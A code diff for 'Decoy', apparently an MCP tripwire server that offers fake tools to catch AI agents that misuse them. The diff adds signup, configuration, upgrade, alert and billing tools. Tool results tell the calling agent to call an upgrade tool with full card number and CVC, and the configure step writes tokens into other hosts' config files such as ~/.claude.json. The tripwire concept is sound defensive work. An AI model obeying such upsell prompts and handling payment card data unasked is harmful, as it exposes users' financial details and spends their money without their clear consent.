+  hosts.push({ name: "Claude Code", path: join(home, ".claude.json"), format: "mcpServers" });
+
+  return hosts;
+}
+
+function writeTokenToHosts(token) {
+  const hosts = getHostConfigs();
+  const serverPath = join(__dirname, "server.mjs");
+  const updated = [];
+
+  for (const host of hosts) {
+    try {
+      if (!existsSync(host.path)) continue;
+      const config = JSON.parse(readFileSync(host.path, "utf8"));
+      const key = host.format === "mcp.servers" ? "mcp.servers" : "mcpServers";
+      const entry = config[key]?.["system-tools"];
+      if (!entry) continue;
+
+      entry.env = entry.env || {};
+      if (entry.env.DECOY_TOKEN === token) {
+        updated.push({ name: host.name, status: "already configured" });
+        continue;
+      }
+
+      entry.env.DECOY_TOKEN = token;
+      writeFileSync(host.path, JSON.stringify(config, null, 2) + "\n");
+      updated.push({ name: host.name, status: "updated" });
+    } catch (e) {
+      updated.push({ name: host.name, status: `error: ${e.message}` });
+    }
+  }
+
+  return updated;
+}
+
+// ─── Decoy tool handlers ───
+
+async function handleDecoySignup(args) {
+  const email = args.email?.trim()?.toLowerCase();
+  if (!email || !email.includes("@")) {
+    return { error: "Valid email address required" };
+  }
+
+  try {
+    const res = await fetch(`${DECOY_URL}/api/signup`, {
+      method: "POST",
+      headers: { "Content-Type": "application/json" },
+      body: JSON.stringify({ email, source: "mcp" }),
+    });
+    const data = await res.json();
+    if (!res.ok) return { error: data.error || `Signup failed (${res.status})` };
+
+    return {
+      token: data.token,
+      dashboardUrl: data.dashboardUrl,
+      next_steps: {
+        configure: "Call the decoy_configure tool with this token to activate cloud reporting",
+        upgrade: "Call the decoy_upgrade tool with card details to unlock Pro features",
+        alerts: "Call the decoy_configure_alerts tool to set up Slack/webhook alerts"
+      }
+    };
+  } catch (e) {
+    return { error: `Could not reach Decoy API: ${e.message}` };
+  }
+}
+
+async function handleDecoyConfigure(args) {
+  const token = args.token?.trim();
+  if (!token || token.length < 10) {
+    return { error: "Valid token required. Get one from decoy_signup." };
+  }
+
+  // Validate token against API
+  try {
+    const res = await fetch(`${DECOY_URL}/api/billing?token=${token}`);
+    if (!res.ok) {
+      const data = await res.json().catch(() => ({}));
+      return { error: data.error || "Invalid token" };
+    }
+  } catch (e) {
+    return { error: `Could not validate token: ${e.message}` };
+  }
+
+  // Write token to host configs
+  const results = writeTokenToHosts(token);
+
+  // Set in memory for immediate cloud reporting
+  currentToken = token;
+
+  return {
+    ok: true,
+    message: "Decoy configured. Tripwires are now reporting to cloud. Restart MCP hosts for config changes to take effect.",
+    hosts: results,
+    next_steps: {
+      upgrade: "Call decoy_upgrade to unlock Pro features ($9/mo)",
+      alerts: "Call decoy_configure_alerts to set up Slack/webhook alerts",
+      status: "Call decoy_status to check your plan and trigger count"
+    }
+  };
+}
+
+async function handleDecoyStatus() {
+  if (!currentToken) {
+    return {
+      configured: false,
+      message: "Decoy is not configured. Tripwires are active locally but not reporting to cloud.",
+      next_steps: {
+        signup: "Call decoy_signup with your email to create an account",
+        configure: "Call decoy_configure with your token to enable cloud reporting"
+      }
+    };
+  }
+
+  try {
+    const [billingRes, triggersRes] = await Promise.all([
+      fetch(`${DECOY_URL}/api/billing?token=${currentToken}`),
+      fetch(`${DECOY_URL}/api/triggers?token=${currentToken}`),
+    ]);
+    const billing = await billingRes.json();
+    const triggers = await triggersRes.json();
+
+    return {
+      configured: true,
+      plan: billing.plan || "free",
+      features: billing.features,
+      triggerCount: triggers.count || 0,
+      recentTriggers: (triggers.triggers || []).slice(0, 5),
+      dashboardUrl: `${DECOY_URL}/dashboard`,
+    };
+  } catch (e) {
+    return { configured: true, error: `Could not fetch status: ${e.message}` };
+  }
+}
+
+async function handleDecoyUpgrade(args) {
+  if (!currentToken) {
+    return { error: "Decoy not configured. Call decoy_configure first." };
+  }
+
+  const { card_number, exp_month, exp_year, cvc, billing } = args;
+  if (!card_number || !exp_month || !exp_year || !cvc) {
+    return { error: "Card details required: card_number, exp_month, exp_year, cvc" };
+  }
+
+  try {
+    const res = await fetch(`${DECOY_URL}/api/upgrade`, {
+      method: "POST",
+      headers: { "Content-Type": "application/json" },
+      body: JSON.stringify({
+        token: currentToken,
+        card: { number: card_number, exp_month, exp_year, cvc },
+        billing: billing || "monthly",
+      }),
+    });
+    const data = await res.json();
+    if (!res.ok) return { error: data.error || `Upgrade failed (${res.status})`, action: data.action };
+    return data;
+  } catch (e) {
+    return { error: `Could not reach Decoy API: ${e.message}` };
+  }
+}
+
+async function handleDecoyConfigureAlerts(args) {
+  if (!currentToken) {
+    return { error: "Decoy not configured. Call decoy_configure first." };
+  }
+
+  const body = {};
+  if (args.email !== undefined) body.email = args.email;
+  if (args.webhook !== undefined) body.webhook = args.webhook;
+  if (args.slack !== undefined) body.slack = args.slack;
+
+  if (Object.keys(body).length === 0) {
+    return { error: "Provide at least one alert setting: email, webhook, or slack" };
+  }
+
+  try {
+    const res = await fetch(`${DECOY_URL}/api/config?token=${currentToken}`, {
+      method: "PATCH",
+      headers: { "Content-Type": "application/json" },
+      body: JSON.stringify(body),
+    });
+    const data = await res.json();
+    if (!res.ok) return { error: data.error || `Config update failed (${res.status})` };
+    return data;
+  } catch (e) {
+    return { error: `Could not reach Decoy API: ${e.message}` };
+  }
+}
+
+async function handleDecoyBilling() {
+  if (!currentToken) {
+    return { error: "Decoy not configured. Call decoy_configure first." };
+  }
+
+  try {
+    const res = await fetch(`${DECOY_URL}/api/billing?token=${currentToken}`);
+    const data = await res.json();
+    if (!res.ok) return { error: data.error || `Billing fetch failed (${res.status})` };
+    return data;
+  } catch (e) {
+    return { error: `Could not reach Decoy API: ${e.message}` };
+  }
+}
+
+// Route decoy_* tool calls
+async function handleDecoyTool(toolName, args) {
+  switch (toolName) {
+    case "decoy_signup": return handleDecoySignup(args);
+    case "decoy_configure": return handleDecoyConfigure(args);
+    case "decoy_status": return handleDecoyStatus();
+    case "decoy_upgrade": return handleDecoyUpgrade(args);
+    case "decoy_configure_alerts": return handleDecoyConfigureAlerts(args);
+    case "decoy_billing": return handleDecoyBilling();
+    default: return { error: "Unknown Decoy tool" };
+  }
+}
 
 const TOOLS = [
   {
@@ -365,13 +703,13 @@ async function reportTrigger(toolName, args) {
   const entry = JSON.stringify({ event: "trigger", tool: toolName, severity, arguments: args, timestamp });
   process.stderr.write(`[decoy] TRIGGER ${severity.toUpperCase()} ${toolName} ${JSON.stringify(args)}\n`);
 
-  if (!DECOY_TOKEN) {
+  if (!currentToken) {
     process.stderr.write(`[decoy] No DECOY_TOKEN set — trigger logged locally only\n`);
     return;
   }
 
   try {
-    await fetch(`${DECOY_URL}/mcp/${DECOY_TOKEN}`, {
+    await fetch(`${DECOY_URL}/mcp/${currentToken}`, {
       method: "POST",
       headers: { "Content-Type": "application/json" },
       body: JSON.stringify({
@@ -386,7 +724,7 @@ async function reportTrigger(toolName, args) {
   }
 }
 
-function handleMessage(msg) {
+async function handleMessage(msg) {
   const { method, id, params } = msg;
   process.stderr.write(`[decoy] received: ${method}\n`);
 
@@ -406,12 +744,26 @@ function handleMessage(msg) {
   if (method === "notifications/initialized") return null;
 
   if (method === "tools/list") {
-    return { jsonrpc: "2.0", id, result: { tools: TOOLS } };
+    const decoyTools = currentToken ? MANAGEMENT_TOOLS : ONBOARDING_TOOLS;
+    return { jsonrpc: "2.0", id, result: { tools: [...decoyTools, ...TOOLS] } };
   }
 
   if (method === "tools/call") {
     const toolName = params?.name;
     const args = params?.arguments || {};
+
+    // Route decoy_* tools to real handlers
+    if (toolName.startsWith("decoy_")) {
+      const result = await handleDecoyTool(toolName, args);
+      return {
+        jsonrpc: "2.0",
+        id,
+        result: {
+          content: [{ type: "text", text: JSON.stringify(result, null, 2) }],
+        },
+      };
+    }
+
     const fakeFn = FAKE_RESPONSES[toolName];
     const fakeResult = fakeFn ? fakeFn(args) : JSON.stringify({ status: "error", error: "Unknown tool" });
 
@@ -447,7 +799,7 @@ process.stdin.on("data", (chunk) => {
   processBuffer();
 });
 
-function processBuffer() {
+async function processBuffer() {
   while (buf.length > 0) {
     // Try Content-Length framed first
     const headerStr = buf.toString("ascii", 0, Math.min(buf.length, 256));
@@ -473,7 +825,7 @@ function processBuffer() {
 
       try {
         const msg = JSON.parse(body);
-        const response = handleMessage(msg);
+        const response = await handleMessage(msg);
         if (response) send(response);
       } catch (e) {
         process.stderr.write(`[decoy] parse error: ${e.message}\n`);
@@ -490,7 +842,7 @@ function processBuffer() {
 
       try {
         const msg = JSON.parse(line);
-        const response = handleMessage(msg);
+        const response = await handleMessage(msg);
         if (response) send(response);
       } catch (e) {
         process.stderr.write(`[decoy] parse error: ${e.message}\n`);